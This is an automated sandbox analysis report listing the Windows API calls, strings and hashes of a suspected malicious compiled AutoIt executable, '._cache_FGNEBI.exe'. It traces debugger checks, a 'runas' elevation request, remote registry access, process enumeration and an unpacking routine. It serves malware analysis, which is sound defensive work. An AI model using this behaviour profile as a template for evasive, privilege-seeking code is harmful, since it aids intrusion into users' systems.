GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D9376D

Part of subcall function 00D94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00000000,00000001,00000000), ref: 00D9428C

IsDebuggerPresent.KERNEL32(?,?), ref: 00D9377F
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00E51120,C:\Users\user\Desktop\._cache_FGNEBI.exe,00E51124,?,?), ref: 00D937EE

Part of subcall function 00D934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D9352A

SetCurrentDirectoryW.KERNEL32(?), ref: 00D93860
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00E42934,00000010), ref: 00E021C5
SetCurrentDirectoryW.KERNEL32(?,?), ref: 00E021FD
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00E02232
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E2DAA4), ref: 00E02290
ShellExecuteW.SHELL32(00000000), ref: 00E02297

Part of subcall function 00D930A5: GetSysColorBrush.USER32(0000000F), ref: 00D930B0
Part of subcall function 00D930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D930BF
Part of subcall function 00D930A5: LoadIconW.USER32(00000063), ref: 00D930D5
Part of subcall function 00D930A5: LoadIconW.USER32(000000A4), ref: 00D930E7
Part of subcall function 00D930A5: LoadIconW.USER32(000000A2), ref: 00D930F9
Part of subcall function 00D930A5: RegisterClassExW.USER32(?), ref: 00D93167

Part of subcall function 00D92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D92ECB
Part of subcall function 00D92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D92EEC
Part of subcall function 00D92E9D: ShowWindow.USER32(00000000), ref: 00D92F00
Part of subcall function 00D92E9D: ShowWindow.USER32(00000000), ref: 00D92F09

Part of subcall function 00D93598: _memset.LIBCMT ref: 00D935BE
Part of subcall function 00D93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D93667

Strings

C:\Users\user\Desktop\._cache_FGNEBI.exe, xrefs: 00D937B4, 00D937E9, 00D937FD, 00E02257
", xrefs: 00D9379D
runas, xrefs: 00E0228B
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00E021BE

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: C:\Users\user\Desktop\._cache_FGNEBI.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
API String ID: 4253510256-1103283160
Opcode ID: 05398e367ab25913fcb32bfb076df648be072a25f5c70ca43f70c02319fdfb71
Instruction ID: fff449003058d66a14de97e72a66e23531c4ba809cfa88ee77cf16f6749ef630
Opcode Fuzzy Hash: 05398e367ab25913fcb32bfb076df648be072a25f5c70ca43f70c02319fdfb71
Instruction Fuzzy Hash: 6951F374648344BECF10ABA2EC46FFD7B68DB45715F04589AFB51B21E1CA608A49CB32

Function 00DF30AD Relevance: 16.9, APIs: 11, Instructions: 397
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF317F

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00DF321E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DF32B6
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DF34F5
RegCloseKey.ADVAPI32(00000000), ref: 00DF3502

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 30841ed8972f8f160399e57436e1e08a1f3a164c9ea04da855f4f64aa286d9ad
Instruction ID: 9796f385dc254f5dd4b291d06cf37fa851fb9d251ad6ff5b83ed1a9dea4eb413
Opcode Fuzzy Hash: 30841ed8972f8f160399e57436e1e08a1f3a164c9ea04da855f4f64aa286d9ad
Instruction Fuzzy Hash: E7E17C71204204AFCB14DF29C891D2ABBE9EF89714F05C96DF54ADB261DB31EE05CB62

Function 00D929C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00D92A33
KillTimer.USER32(?,00000001), ref: 00D92A5D
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D92A80
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92A8B
CreatePopupMenu.USER32 ref: 00D92A9F
PostQuitMessage.USER32(00000000), ref: 00D92AAE

Strings

TaskbarCreated, xrefs: 00D92A86

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 5c8cb2d8703df1f379f87e60a1f90a383d472221cc11ef4af4e58ed7647f01bd
Instruction ID: 0ba986c1b66726534f9cc27da2c0f2cd02319017e6b46b82595f985ea32f68a9
Opcode Fuzzy Hash: 5c8cb2d8703df1f379f87e60a1f90a383d472221cc11ef4af4e58ed7647f01bd
Instruction Fuzzy Hash: 15411532244246BFDF38AF65EC0ABB93799E714305F044959FA42B61E1DA74DC888771

Function 00DAE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00DAE4A7

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

GetCurrentProcess.KERNEL32(00000000,00E2DC28,?,?), ref: 00DAE567
GetNativeSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5BC
FreeLibrary.KERNEL32(00000000,?,?), ref: 00DAE5C7
FreeLibrary.KERNEL32(00000000,?,?), ref: 00DAE5DA
GetSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5E4
GetSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5F0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
String ID:
API String ID: 2717633055-0
Opcode ID: 840963a2911bd50d0d774883d1a64365fa23f71149c347048835e1e2d971765c
Instruction ID: 2971fe5facd776f625cbc7e389d4d4007506f42ce25f7949110e137addce6021
Opcode Fuzzy Hash: 840963a2911bd50d0d774883d1a64365fa23f71149c347048835e1e2d971765c
Instruction Fuzzy Hash: EE61E1B180A384CFCF15CF68A8C01E97FB5AF6A308F1849D8D884AB247D624C948CF75

Function 00D931F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D93202
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D93219
LoadResource.KERNEL32(?,00000000), ref: 00E057D7
SizeofResource.KERNEL32(?,00000000), ref: 00E057EC
LockResource.KERNEL32(?), ref: 00E057FF

Strings

SCRIPT, xrefs: 00D9320F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 54551d47be243b2982c75abc4b79d3e861e974958806d0333252d3e3ba1cd28f
Instruction ID: 3a2a564c2d9aa8cb101082c43b1e95bcc6615c14bec77d7fc3e7fe5b30106d7b
Opcode Fuzzy Hash: 54551d47be243b2982c75abc4b79d3e861e974958806d0333252d3e3ba1cd28f
Instruction Fuzzy Hash: 9B117C71204701BFEB258F66EC48F677BBAEBC9B41F148028F412A62A0DB71DD04CA71

Function 00DD6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DD6F7D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DD6F8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00DD6FAC
__wsplitpath.LIBCMT ref: 00DD6FD0
_wcscat.LIBCMT ref: 00DD6FE3
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DD7022

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: aa9ba92112dc3394303c9ce2260992e04d8c40c9415f08bbab750bf8313d5d9c
Instruction ID: 08a81f21a20acd7ab9bd35d46b6c4a9cde33fd680846f1d47e927e11f0aaf00f
Opcode Fuzzy Hash: aa9ba92112dc3394303c9ce2260992e04d8c40c9415f08bbab750bf8313d5d9c
Instruction Fuzzy Hash: 6C215071904218AFDB11ABA0CC89BEEB7BCAB49300F5404E6F545E3241E7759F84CB70

Function 00EF30B0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00EF31EA
GetProcAddress.KERNEL32(?,00EECFF9), ref: 00EF3208
ExitProcess.KERNEL32(?,00EECFF9), ref: 00EF3219
VirtualProtect.KERNEL32(00D90000,00001000,00000004,?,00000000), ref: 00EF3267
VirtualProtect.KERNEL32(00D90000,00001000), ref: 00EF327C

Memory Dump Source

Source File: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 85eb2089840252d04838fee7d1d113cc3b734ee55c12f2c950d44f60f153c6ed
Instruction ID: 55c927856a8e343ce50a6518e8badf4c616c658c666495ad02f48f60ebba5612
Opcode Fuzzy Hash: 85eb2089840252d04838fee7d1d113cc3b734ee55c12f2c950d44f60f153c6ed
Instruction Fuzzy Hash: 93513FB1A4535A5BD7209EB8CCC06B4B7A4EB5132872C1739C7E2E73C6EB905E06C760

Function 00DDEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00DD78CB

CoInitialize.OLE32(00000000), ref: 00DDF04D
CoCreateInstance.COMBASE(00E1DA7C,00000000,00000001,00E1D8EC,?), ref: 00DDF066
CoUninitialize.COMBASE ref: 00DDF083

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

Strings

.lnk, xrefs: 00DDF02B, 00DDF03D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 0375c05c42643a0ae30b75c7f8ff575d95f88ce98bb3cc794046de4cee22efcc
Instruction ID: 85dd285185b3f8e6a98f299e8e325467029f334a486d6e11ad01483363aca359
Opcode Fuzzy Hash: 0375c05c42643a0ae30b75c7f8ff575d95f88ce98bb3cc794046de4cee22efcc
Instruction Fuzzy Hash: E2A14975604301AFCB14DF14C884D6ABBE5FF89720F148959F89AAB361CB31ED45CBA1

Function 00DADD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00D9C848,00D9C848), ref: 00DADDA2
FindFirstFileW.KERNEL32(00D9C848,?), ref: 00E04A83

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$AttributesFindFirst
String ID:
API String ID: 4185537391-0
Opcode ID: 58b6a11bcec2b0d6c80ed0c37acd9e851f92000d497288426843029d7938e7b8
Instruction ID: fc3b172ef15f95a3233ac1959c36eaa59ec93ef9fccbd7ab608480bdbc4f787b
Opcode Fuzzy Hash: 58b6a11bcec2b0d6c80ed0c37acd9e851f92000d497288426843029d7938e7b8
Instruction Fuzzy Hash: 2AE0D8715195117B87146B38DC0D8E9376C9F0633CB104709F976E10E0F7709D4885E6

Function 00D9DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 406e5da9b706345c39c4951d9841ae55054747fad5de456f79a261b398cb690a
Instruction ID: 72716e0bf311ce4bcc771b710b30be63f952f0aa73e7a29d0ca3f8dc2a968c9b
Opcode Fuzzy Hash: 406e5da9b706345c39c4951d9841ae55054747fad5de456f79a261b398cb690a
Instruction Fuzzy Hash: 0D229F74A00205DFDF14DF58C491AAAF7F1FF15300F188169E89AAB391E771E985CBA1

Function 00DA3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: c192a0d466155af6870999ef46bd01e1649f295149d59a3ce5dbbaae26303dc3
Instruction ID: c34864ca72b7749963460ce95a1822f78d403eefbfcddbbe26b52a436636e84b
Opcode Fuzzy Hash: c192a0d466155af6870999ef46bd01e1649f295149d59a3ce5dbbaae26303dc3
Instruction Fuzzy Hash: E3926B706083419FD714DF18C480B6ABBE1FF85304F18896DF98A9B2A2D775ED85CB62

Function 00E0C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00E0C158

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 6323ded518eaddb4cd16135cd6da60ee472b7401768bbf2c31740a75e5ee17c5
Instruction ID: c339c8c3a060ab63e3973006745b648a5c5d140a48668116badbe6f5fc8f7425
Opcode Fuzzy Hash: 6323ded518eaddb4cd16135cd6da60ee472b7401768bbf2c31740a75e5ee17c5
Instruction Fuzzy Hash: B6C002B14040099FC715CB80C9459EAB6BCBB08300F104095A115B1040D7709A459B61

Function 00D9E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E279
timeGetTime.WINMM ref: 00D9E51A
TranslateMessage.USER32(?), ref: 00D9E646
DispatchMessageW.USER32(?), ref: 00D9E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E664
LockWindowUpdate.USER32(00000000), ref: 00D9E697
DestroyWindow.USER32 ref: 00D9E6A3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D9E6BD
Sleep.KERNEL32(0000000A), ref: 00E05B15
TranslateMessage.USER32(?), ref: 00E062AF
DispatchMessageW.USER32(?), ref: 00E062BD
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E062D1

Strings

@TRAY_ID, xrefs: 00E05D6E
@GUI_CTRLHANDLE, xrefs: 00E05C51
@GUI_WINHANDLE, xrefs: 00E05C05
@GUI_CTRLID, xrefs: 00E05BB9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: ae1a8e98a40aba9c325e89cff5546f0a593f386ab920d561e06acb08cf106499
Instruction ID: 548acf9f1a22101cb1f37bf7fcfa50dc7f63dc05ced1a6b4873dc1c3d46f3db5
Opcode Fuzzy Hash: ae1a8e98a40aba9c325e89cff5546f0a593f386ab920d561e06acb08cf106499
Instruction Fuzzy Hash: 5562E271608340DFDB24DF24C885BAA77E4FF45304F18496DE98A9B292D771E888CB72

Function 00DC6A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00DC6C73
___createFile.LIBCMT ref: 00DC6CB4
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DC6CDD
__dosmaperr.LIBCMT ref: 00DC6CE4
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC6CF7
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DC6D1A
__dosmaperr.LIBCMT ref: 00DC6D23
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC6D2C
__set_osfhnd.LIBCMT ref: 00DC6D5C
__lseeki64_nolock.LIBCMT ref: 00DC6DC6
__close_nolock.LIBCMT ref: 00DC6DEC
__chsize_nolock.LIBCMT ref: 00DC6E1C
__lseeki64_nolock.LIBCMT ref: 00DC6E2E
__lseeki64_nolock.LIBCMT ref: 00DC6F26
__lseeki64_nolock.LIBCMT ref: 00DC6F3B
__close_nolock.LIBCMT ref: 00DC6F9B

Part of subcall function 00DBF84C: CloseHandle.KERNEL32(00000000,00E3EEC4,00000000,?,00DC6DF1,00E3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DBF89C
Part of subcall function 00DBF84C: GetLastError.KERNEL32(?,00DC6DF1,00E3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DBF8A6
Part of subcall function 00DBF84C: __free_osfhnd.LIBCMT ref: 00DBF8B3
